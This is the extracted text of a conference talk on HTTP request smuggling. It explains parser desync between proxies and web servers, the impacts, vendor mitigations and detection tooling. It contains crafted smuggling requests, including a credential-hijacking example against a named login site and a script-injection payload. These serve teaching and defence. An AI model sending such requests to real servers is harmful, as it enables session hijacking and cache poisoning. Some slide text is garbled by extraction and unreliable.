

Presented by Philippe Arteau from GoSecure

http://bit.ly/nsec2021-hrs



Bio

- Philippe Arteau
- Security Researcher at **COSECURE**
- Open-source developer
 - Find Security Bugs (SpotBugs Static Analysis for Java)
 - Security Code Scan (Roslyn Static Analysis for .NET)
 - Burp and ZAP Plugins (Retire.js, CSP Auditor, Reissue Request Scripter, ...)
- Volunteer for the **Sec** conference and former trainer

Agenda

- HTTP Tunneling
- What is Request Smuggling?
- Defences
 - Mitigations
 - Detection
- Takeaways

- Attacks
 - Cache poisoning
 - Credentials hijacking
 - URL filtering bypass
 - XSS



This presentation is ... The summary of 3 main research publications



References to newer variants are also given at the end.



HTTP Versions

- HTTP/1.0 and before: Every request is one TCP connection
 - Lots of TCP handshake
 - No connection pool possible
- HTTP/1.1 uses by default persistent connections
 - Introduce Transfer-Encoding header

HTTP pipelining

With HTTP pipelining, the client does not wait for the response before sending the next request.



Multiple requests in the same TCP socket





HTTP Request Smuggling (HRS): Infrastructure



HTTP Request Smuggling (HRS): Infrastructure



Attacks

All see

...

Early version of HRS (2005)

Abuse difference in the way proxy and web servers parse the **requests' length**.

```
POST /index.htm HTTP/1.1
                                           POST /index.htm HTTP/1.1
Host: myapp.com
                                           Host: myapp.com
Content-Length: 0
                                           Content-Length: 0
Content-Length: 37
                                           Content-Length: 37
                                          GET /profile/1337.json HTTP/1.1
GET /profile/1337.json HTTP/1.1
Bla: GET /test.htm HTTP/1.1
                                           Bla: GET /test.htm HTTP/1.1
Host: myapp.com
                                           Host: myapp.com
Connection: Keep-Alive
                                           Connection: Keep-Alive
Content-Length: 0
                                           Content-Length: 0
                                                 /index.htm and /profile/1337.json
        /index.htm and /test.htm
                                            WebServer use the first header
 Proxy use the last header
```

Ref: <u>https://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf</u>



/test.htm

/profile/1337.json

If the proxy is doing caching to ***.htm** resources, the cache gets **poisoned**!

More Risks

- Cache poisoning
 - Presented with the duplicate Content-Length example
- URL filtering bypass (Blacklist host or path)
- Credentials hijacking
- "Persistent" XSS
- Open-Redirect

Transfer-Encoding: chunked

"Chunked encoding is useful when larger amounts of data are sent to the client and the total size of the response may not be known until the request has been fully processed."

Transfer-Encoding: chunked

HTTP/1.1 200 OK Content-Type: text/plain Transfer-Encoding: chunked

5\r\n Hello\r\n 8\r\n NorthSec\r\n B\r\n Conference!\r\n 0\r\n \r\n

It also work on request!

POST /index.php HTTP/1.1
Host: myapp.com
Transfer-Encoding: chunked

5\r\n Hello\r\n 8\r\n NorthSec\r\n B\r\n Conference!\r\n 0\r\n \r\n

Transfer-Encoding in the specification

"If a message is received with both a **Transfer-Encoding** header field and a **Content-Length** header field, the latter MUST be ignored."

- RFC2616
- Transfer-Encoding should be taken in priority
- Transfer-Encoding might not be implemented by both service

Transfer-Encoding confusion (2016)

Proxy use the **CL** header

Proxy use the **TE** header

<pre>GET / HTTP/1.1 Host: myapp.com Connection: keep-alive Dummy: XXX\rTransfer-Encoding: chunked Content-Length: 121 0</pre>	<pre>GET / HTTP/1.1 Host: myapp.com Connection: keep-alive Dummy: XXX\rTransfer-Encoding: chunked Content-Length: 121 0</pre>		
<pre>POST /update-profile HTTP/1.1 Host: myapp.com Dummy: XXX</pre>	<pre>POST /update-profile HTTP/1.1 Host: myapp.com Dummy: XXXGET / HTTP/1.1 Cookie: SESSIONID=SECRET1234 Content-Length: 0</pre>		

Connection hijacking

Ref: Hiding Wookiees (Defcon 2016) by Régis Leroy

Transfer-Encoding support

If both the proxy and web server support TE, their should be no issue ... right?

\rTransfer-Encoding: chunked Transfer-Encoding: x Transfer-Encoding:**\n**chunked Transfer-Encoding:**[tab]**chunked Transfer-Encoding: xchunked

Transfer-Encoding variations

- Initial techniques developed by Régis Leroy (2016)
- Variations found by James Kettles (2018)

Short names are often use to describe which header is prioritized.

Proxy	Web service	Short name
Content-Length	Transfer-Encoding	CL.TE
Transfer-Encoding	Content-Length	TE.CL
Transfer-Encoding	Transfer-Encoding	TE.TE

Example of real-life scenario



POST /login HTTP/1.1
[...]

login[email]=f@ke.email&login[password]=1234567890

```
HTTP/1.1 200 OK
[...]
```

Please ensure that your email and password are correct.

<input id="email" value="f@ke.email">

Request hijacking

Proxy use the 2nd header (TE Off)

POST / HTTP/1.1

Host: login.newrelic.com Content-Length: 142 Transfer-Encoding: chunked **Transfer-Encoding: x**

0

POST /login HTTP/1.1
Host: login.newrelic.com
Content-Type: application/x-wwwform-urlencoded
Content-Length: 100

login[password] = x & login[email] = X

WS use the **1rst** header (TE On)

POST / HTTP/1.1
Host: login.newrelic.com
Content-Length: 142
Transfer-Encoding: chunked
Transfer-Encoding: x

0

POST /login HTTP/1.1
Host: login.newrelic.com
Content-Type: application/x-wwwform-urlencoded
Content-Length: 100

login[email]=XPOST /login HTTP/1.1
Host: login.newrelic.com

email=super@admin.com&password=

« Persistent » XSS (TE.CL)

Proxy use the **TE** header

```
POST / HTTP/1.1
```

```
Host: saas-app.com
Content-Length: 25
Transfer-Encoding : chunked
```

```
10
=x&cr={creative}&x=
66
POST /index.php HTTP/1.1
Host: saas-app.com
Content-Length: 200
```

```
SAML=a"><script>alert(1)</script>
```

WS use the **CL** header

```
POST / HTTP/1.1
Host: saas-app.com
Content-Length: 25
Transfer-Enco Response 1 ked
10
=x&cr={creati</h1>
66
POST /index.php HITP/I.I
Host: saas-app.com
Content-Length: 200
              Response 2
SAML=a"><scri
                        </script>POST
/ HTTP/1.1
              ...value="a"><script>alert(1)
Host: saas-ap script>POST / HTTP/1.1
Cookie:
              Host: saas-app.com
              Cookie:..."
```

Reference: https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn

Demonstration HRS to XSS

CAM

0

FPS

23.98

Defences

Mitigations

Most have vendors have released fixes

- Apache Trafic Server, Nginx, Varnish, HAProxy
- F5 Big-IP => Advisory K50375550 include two mitigations

The real solution is to **update those services**. Your application is **not the root cause**.

Cloud services have already deployed fixes

• Cloudflare, Fastly, Akamai

Detection

Attack Config					×
risky mode:		poc: collab-abs:		poc-collab domain:	manual-collab-domain-here
poc: collab-XFO-header:		poc: collab-blind:		use turbo for autopoc:	
skip obsolete permutations:		poc: collab-header:		poc: headerConcat:	
skip vulnerable hosts:		poc: collab:		poc: G:	
only report exploitable:		pad everything:		poc: collab-at:	
skip straight to poc:		poc: bodyConcat:		convert GET to POST:	
force method name:		globally swap - with _:		permute: dualchunk:	
permute: commaCow:		permute: cowComma:		permute: contentEnc:	
permute: quoted:		permute: aposed:		permute: revdualchunk:	
permute: nested:		permute: lazygrep:		permute: bodysplit:	
permute: Odsuffix:		permute: tabsuffix:		permute: accentTE:	
permute: accentCH:		permute: spacejoin1:		permute: prefix1:0:	
permute: prefix1:9:		permute: prefix1:11:		permute: prefix1:12:	
permute: prefix1:13:		permute: prefix1:127:		permute: suffix1:0:	
permute: suffix1:9:		permute: suffix1:11:		permute: suffix1:12:	
permute: suffix1:13:		permute: suffix1:127:		thread pool size:	8
use key:		key method:		key status:	
key content-type:		key server:		key header names:	
filter:		mimetype-filter:		resp-filter:	
confirmations:	5	report tentative:		timeout:	10
include origin in cachebusters:		include path in cachebusters:		params: dummy:	
dummy param name:	utm_campaign	params: query:		params: scheme:	
params: scheme-host:		params: scheme-path:		permute: vanilla:	
permute: badwrap:		permute: space1:		permute: badsetupLF:	
permute: gareth1:		permute: nameprefix1:		permute: valueprefix1:	
permute: nospace1:		permute: linewrapped1:		permute: badsetupCR:	
permute: vertwrap:		permute: tabwrap:		permute: multiCase:	
permute: Odwrap:	\square	permute: Odspam:		permute: spaceFF:	
permute: unispace:		permute: connection:		permute: spjunk:	
permute: backslash:		permute: spacefix1:0:		permute: spacefix1:9:	
permute: spacefix1:11:		permute: spacefix1:12:	\checkmark	permute: spacefix1:13:	
permute: spacefix1:127:				Reset Settings	
		ОК	Cancel		

Detection

Dashboard Targe	et Proxy Intruder	Repeater	Sequencer	Decoder	Comparer	Extender	Project
Filter: All, All sour	ces, Capture: All sour	ces					
# Tool	Host	Met	hod URL				
4445 Extender	http://simplewebsite.	.go POST	г /				
1444 Extender	http://simplewebsite.	.go POST	г /				
443 Extender	http://simplewebsite.	.go POST	г /				
442 Extender	http://simplewebsite.	.go POST	г /				
441 Extender	http://simplewebsite.	.go POST	г /				
440 Extender	http://simplewebsite.	.go POST	г				
439 Extender	http://simplewebsite.	.go POST	r /				
438 Extender	http://simplewebsite	.go POST	г /				
437 Extender	http://simplewebsite.	.go POST	г /				
436 Extender	http://simplewebsite.	.go POST	r /				
435 Extender	http://simplewebsite.	.go POST	r /				
434 Extender	http://simplewebsite.	.go POST	r /				
433 Extender	http://simplewebsite.	.go POST	r /				
432 Extender	http://simplewebsite	.go POST	г /				
431 Extender	http://simplewebsite.	.go POST	г /				
c							
Raw Params H	leaders Hex					R	aw Hea
							_
Pretty Raw	\n Actions ∽						Pretty F
1 POST / HTTP	2/1.1					A 1	HTTP/1
2 Host: simpl	lewebsite.gosec.c	0				2	2 Server
3 User-Agent:	Mozilla/5.0 (Ma	cintosh;	Intel Mac	05 X 10_1	4_2)		3 Date:
AppleWebKit	:/537.36 (KHTML, :	like Geck	o) Chrome/	71.0.3578	. 98	4	1 Cont er
Safari/537.36 5 Conter							
4 Accept:						6	6 Age: 0
text/html,a	application/xhtml	+x ml,appl	ication/×m	l;q=0.9,i	mage/web	7	/ Connec
p,*/*;q=0.8	3					3	3
5 Accept -Lang	guage: en-CA, en-U	S;q=0.7,e	n;q=0.3			9	<pre>> <html></html></pre>
6 Accept -Enco	oding: gzip, defl	ate				10	3 <hea< td=""></hea<>
/ Referer: nt	tp://simplewebsi	te.gosec.	co/contact	.pnp			<111
o Ungrado Tro	ciose ocupo Boguosta	1					40
9 Opgrade-Ins	col: max_age=0	1					(/head
1 Content - Tyr	e: application/x	-www-form	-urlencode	d		11	Chodys
2 Content -Ler	oth: 6		arreneoue			12	Cen
3 Foo: bar						1	ch
4 Transfer-Er	coding: chunked						
15							</td

	P	retty Raw Render \n Actions ~							
	1	HTTP/1.1 405 Not Allowed							
	2	Server: ATS/7.1.1							
	3	Date: Fri, 21 May 2021 12:10:04 GMT							
	4	Content-Type: text/html							
	5	Content-Length: 552							
	6	Age: Ø							
	7	Connection: close							
	8								
	9	<html></html>							
	10	<head></head>							
		<title></title>							
		405 Not Allowed							
	11	<body></body>							
	12	<center></center>							
		<h1></h1>							
		405 Not Allowed							
: 1	e>	llowed							
itle>									
nt h1	er>								
4	105 Not	Allowed							

Detection





Takeaways

- Request Smuggling is an infrastructure vulnerability that could affect greatly your application
 - Cache poisoning, Credentials hijacking, URL filtering bypass, Persistent XSS and Open-Redirect
- Your "production" environment needs to be tested
 - Often test environments do not have caching, load balancer or additional proxies..
- Use automate tool to detect (lots of variants to cover)

New variants

- WebSocket Request Smuggling found by Mikhail Egorov (2019)
- HTTP/2 Cleartext Request Smuggling found by Jake Miller (2020)



*New variants are still found with CL and TE

Questions

John Grisham

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C-DA SNYBK JOLBANT DE BOKD

Contact information

- parteau@gosecure.ca
- @GoSecure_Inc
- @h3xStream

Slides

http://bit.ly/nsec2021-hrs

Demonstrations

• CL.TE triggering an XSS

https://github.com/GoSecure/request-smuggling-nsec-demo

• HTTP2 Upgrade

https://github.com/BishopFox/h2csmuggler

References

- Original Watchfire paper (2005) <u>https://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf</u>
- Hiding Wookiees by Régis Leroy <u>https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20pres</u> <u>entations/DEF%20CON%2024%20-%20Regilero-Hiding-Wookiees-In-</u> <u>Http.pdf</u>
- PortSwigger publication (2019) : <u>https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn</u>

New variants

• WebSocket HRS

https://github.com/0ang3el/websocket-smuggle

• HTT2 Cleartext upgrade HRS

https://labs.bishopfox.com/tech-blog/h2c-smuggling-requestsmuggling-via-http/2-cleartext-h2c